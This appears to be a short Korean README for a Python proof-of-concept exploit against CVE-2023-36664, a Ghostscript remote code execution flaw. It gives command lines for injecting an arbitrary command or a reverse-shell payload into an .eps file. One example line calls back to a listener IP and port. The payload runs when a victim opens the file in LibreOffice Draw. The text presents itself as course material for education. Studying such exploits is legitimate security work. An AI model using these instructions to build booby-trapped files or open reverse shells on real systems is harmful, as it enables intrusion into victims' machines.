
CVE-2023-36664 Ghostscript RCE용 Python PoC입니다. LibreOffice Draw를 통해 코드 실행을 트리거하기 위해 .eps 파일에 페이로드 또는 리버스 셸을 주입합니다.
CVE-2023-36664에 대한 개념 증명 코드입니다.
.eps 파일에 페이로드를 삽입하려면:
python3 poc.py -f "파일이름" --payload "명령어"
#python3 poc.py -f file.eps --payload firefox
.eps 파일에 리버스 셸 페이로드를 삽입하려면:
python3 poc.py -f "파일이름" --revshell --ip "IP" --port "포트"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
주입된 파일을 Libreoffice Draw에서 열면 페이로드가 실행됩니다.
이 개념 증명 코드는 대학의 특정 강의를 위해 개발되었습니다. 교육적 목적으로만 여기에 게시되었습니다.